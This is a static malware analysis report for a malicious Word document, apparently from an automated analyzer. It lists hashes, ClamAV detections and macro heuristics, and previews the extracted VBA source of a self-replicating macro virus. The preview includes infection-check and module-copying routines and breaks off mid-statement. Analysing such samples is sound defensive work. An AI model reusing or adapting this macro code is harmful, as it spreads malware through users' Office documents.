Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ba5d8dc6a5ee12e4…

MALICIOUS

Office (OLE)

55.5 KB Created: 2001-07-17 17:01:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e7639c0afcba545f26854f32b7fdeebb SHA-1: 9f2067a82f6658e9574749207c08b79709ad85dc SHA-256: ba5d8dc6a5ee12e45aab06768e34c9cbd2b40591b1ce31db75faa3a747827408
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample exhibits high-severity heuristics for legacy WordBasic macro-virus markers and VBA macros, including AutoOpen and Auto_Close functions. ClamAV detections identify it as 'Doc.Trojan.Shore-5' and an extracted artifact as 'Win.Trojan.C-286'. The presence of these macros strongly suggests the document is intended to execute malicious code, likely for further payload delivery or system compromise.

Heuristics 5

  • ClamAV: Doc.Trojan.Shore-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Shore-5
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 33413 bytes
SHA-256: 50020910d0714f52b466917dd6d498ab1b40d9c4521c553c93617fb277f05154
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ANI"
'
'Thanks to cyberHack, ANDIE_71, Marker, etc.
'I love STM. CHENDRAWASHE 1870
'
'Public declaration
'
'
Public Const SeriesNumber = 1870
Public Const ModuleName = "ANI", mw = "Micropost Wod", _
        OFC = "I Dont Like Peace Anymore ...", _
        Peace = "I Like Chaos Only", _
        SerNum$ = "Series Number", _
        pass = "Password : ", _
        ani = "Protected by. ANDIE_71 ...", _
        scrollCap = "Normal." & ModuleName & ".scrollCaption"

Public Const msg = "Virus Ini Khusus Buat ANI Sayaang ...", _
        aaa = "§·_n²__", bbb = "wenni", ccc = "cool9908", _
        abadacc = "Passwordnya Salah GOBLOK ...", _
        code = "backbone130274", ddd = "junkies9908", eee = "Timor9909"

Public anCap As String, anInt As Single, anPos As Integer, Animated As Boolean, _
        ToolsOptionsDlg As Dialog, _
        OrganizerDlg As Dialog, _
        ToolsTemplatesDlg As Dialog, _
        ToolsMacrosDlg As Dialog, _
        FormatStyleDlg As Dialog

'procedures in ani module
Sub Buggy()
Dim aDocProp As DocumentProperty
    For Each aDocProp In NormalTemplate.CustomDocumentProperties
        aDocProp.Delete
    Next aDocProp
    
    NormalTemplate.CustomDocumentProperties.Add _
            Name:=SerNum$, _
            Type:=msoPropertyTypeNumber, _
            Value:=SeriesNumber, _
            LinkToContent:=False
End Sub


Function getDocPropExist(theObject As Object) As Boolean
Dim adp As DocumentProperty
    getDocPropExist = False
    For Each adp In theObject.CustomDocumentProperties
    With adp
        If .Name = SerNum$ And .Type = msoPropertyTypeNumber And _
            .Value = SeriesNumber Then
            getDocPropExist = True
            Exit Function
        End If
    End With
    Next adp
End Function

Function getModuleExist(theObject As Object) As Boolean
Dim aDocProp As DocumentProperty
    getModuleExist = False
    For Each anObject In theObject.VBProject.VBComponents
        If anObject.Name = ModuleName Then
            getModuleExist = True
            Exit Function
        End If
    Next anObject
End Function
    
Function getInfected(theObject As Object) As Boolean
    getInfected = getModuleExist(theObject) And getDocPropExist(theObject)
End Function

Sub clearMacros(theObject As Object)
Dim aDocProp As DocumentProperty
    For Each anObject In theObject.VBProject.VBComponents
        If anObject.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=theObject.FullName, _
            Name:=anObject.Name, Object:=wdOrganizerObjectProjectItems
        Else
            On Error Resume Next
            With anObject.codemodule
                .deletelines 1, .countoflines
            End With
        End If
    Next anObject
    
    For Each aDocProp In theObject.CustomDocumentProperties
        aDocProp.Delete
    Next aDocProp
End Sub

Sub copyMacros(theSource As Object, theDestination As Object)
Dim aDocProp As DocumentProperty
    If Not getDocPropExist(theDestination) Then _
        theDestination.CustomDocumentProperties.Add _
            Name:=SerNum$, _
            Type:=msoPropertyTypeNumber, _
            Value:=SeriesNumber, _
            LinkToContent:=False

    On Error Resume Next
        Application.OrganizerCopy _
            Source:=theSource.FullName, _
            Destination:=theDestination.FullName, _
            Name:=ModuleName, _
            Object:=wdOrganizerObjectProjectItems
End Sub

Sub Infecting(theSource As Object, theDestination As Object)
    On Error Resume Next
    If Not getInfected(theDestination) Then
        Application.OrganizerRename _
            Source:=theDestination.FullName, _
            Name:=ModuleName, newname:="xxxx",
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.